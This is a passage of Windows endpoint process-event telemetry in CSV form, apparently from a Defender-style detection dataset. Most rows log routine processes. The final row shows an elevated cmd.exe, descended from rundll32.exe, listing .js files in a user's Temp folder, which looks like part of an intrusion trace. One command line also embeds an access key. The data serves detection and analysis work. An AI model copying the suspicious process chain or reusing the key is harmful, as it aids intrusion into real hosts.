+521,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:13:55.481620300+00:00,2012,MpCmdRun.exe,"""MpCmdRun.exe"" -IdleTask -TaskName WdCleanup",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:13:55.523484300+00:00,2021-06-25 01:15:08.020015300+00:00,89fd9bd1-3f73-4f32-909b-ecbccea26975,computerpii_0a470890c60768167990033d701e7bd881398861,183062,False,10.7740.19041.1052,False,11540474045136925,,11540474045178679,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+522,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:13:55.486994800+00:00,8476,MpCmdRun.exe,"""MpCmdRun.exe"" -IdleTask -TaskName WdVerification",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:13:55.523829300+00:00,2021-06-25 01:15:08.020085300+00:00,127d4940-a2d4-45bc-8657-25596879f6f4,computerpii_0a470890c60768167990033d701e7bd881398861,183063,False,10.7740.19041.1052,False,11540474045136925,,11540474045178680,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+523,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:13:55.487559500+00:00,4328,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 01:13:55.481620300+00:00,2012,MpCmdRun.exe,"""MpCmdRun.exe"" -IdleTask -TaskName WdCleanup",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:13:55.524003300+00:00,2021-06-25 01:15:08.020154900+00:00,30032ae5-bb2c-4813-af0a-ffef2084fa1d,computerpii_0a470890c60768167990033d701e7bd881398861,183064,False,10.7740.19041.1052,False,11540474045178679,,11540474045178681,2021-06-25 01:13:55.481620300+00:00,2012,2021-06-25 01:13:55.481620300+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,2012,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-25 00:54:41.452989300+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+524,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:13:55.492418800+00:00,15748,MpCmdRun.exe,"""MpCmdRun.exe"" -IdleTask -TaskName WdCacheMaintenance",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:13:55.524505400+00:00,2021-06-25 01:15:08.020224600+00:00,00444250-e3b4-4e01-8a74-aaee30b41cbd,computerpii_0a470890c60768167990033d701e7bd881398861,183065,False,10.7740.19041.1052,False,11540474045136925,,11540474045178682,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+525,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:13:55.493383500+00:00,18072,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 01:13:55.486994800+00:00,8476,MpCmdRun.exe,"""MpCmdRun.exe"" -IdleTask -TaskName WdVerification",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:13:55.524747600+00:00,2021-06-25 01:15:08.020295300+00:00,89aa38dd-b39e-4c9c-b3c9-7c0a962154c2,computerpii_0a470890c60768167990033d701e7bd881398861,183066,False,10.7740.19041.1052,False,11540474045178680,,11540474045178683,2021-06-25 01:13:55.486994800+00:00,8476,2021-06-25 01:13:55.486994800+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,8476,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-25 00:54:41.452989300+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+526,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:13:55.497551400+00:00,20224,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 01:13:55.492418800+00:00,15748,MpCmdRun.exe,"""MpCmdRun.exe"" -IdleTask -TaskName WdCacheMaintenance",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:13:55.525790800+00:00,2021-06-25 01:15:08.020378600+00:00,97495ad8-ddd8-4fd8-84e4-5f594cf00b54,computerpii_0a470890c60768167990033d701e7bd881398861,183067,False,10.7740.19041.1052,False,11540474045178682,,11540474045178684,2021-06-25 01:13:55.492418800+00:00,15748,2021-06-25 01:13:55.492418800+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,15748,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-25 00:54:41.452989300+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+527,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:33:56.375511200+00:00,14376,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320747_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320747 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:33:56.612714600+00:00,2021-06-24 01:35:43.458097300+00:00,e09af86f-d2d7-411f-932b-498a0fd4d100,computerpii_0a470890c60768167990033d701e7bd881398861,172250,False,10.7740.19041.1052,False,11540474045144190,,11540474045175772,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,20480.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+528,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:43:27.880666200+00:00,16408,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320639_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320639 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:43:27.929250600+00:00,2021-06-23 01:44:05.701336500+00:00,f63f19d5-a559-4234-9cde-4a5dec45e09d,computerpii_0a470890c60768167990033d701e7bd881398861,159065,False,10.7740.19041.1052,False,11540474045144190,,11540474045172541,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+529,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:26:29.959652900+00:00,17540,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 3EF49C15-EE36-DE6F-E833-78011F776F4F ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:26:29.977932+00:00,2021-06-23 04:28:38.595404600+00:00,743cb0b9-0415-45e4-adc5-64b89e0b6b4a,computerpii_0a470890c60768167990033d701e7bd881398861,162663,False,10.7740.19041.1052,False,11540474045145394,,11540474045173428,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,16512,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+530,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:36:48.794103+00:00,7152,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1276 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:36:49.641374400+00:00,2021-06-23 02:37:39.378678800+00:00,888749f2-4e7e-4dd4-a101-e6d2be8c7b42,computerpii_0a470890c60768167990033d701e7bd881398861,159858,False,10.7740.19041.1052,False,11540474045171833,,11540474045172773,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+531,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:36:56.567190300+00:00,13532,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\POI\FilePII_0085bace72cef727545370811bdd1271b2227fd7.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:36:56.686608700+00:00,2021-06-24 07:38:53.372200200+00:00,9ebc01a8-f9c1-4390-97f5-a5355903f720,computerpii_0a470890c60768167990033d701e7bd881398861,177182,False,10.7740.19041.1052,False,11540474045175127,,11540474045177147,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,18560,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+532,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:35:08.383758900+00:00,1664,cmd.exe,"""cmd.exe"" /c ""dir C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\*.js""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:31:13.489936600+00:00,12940,cmd.exe,cmd.exe ,True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:35:09.056486200+00:00,2021-06-23 03:37:58.616883100+00:00,67e6efa6-9eac-463d-bf1b-2466bb707553,computerpii_0a470890c60768167990033d701e7bd881398861,161942,False,10.7740.19041.1052,False,11540474045173177,,11540474045173199,2021-06-23 03:31:13.489936600+00:00,12940,2021-06-23 03:31:13.489936600+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,12940,18560,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 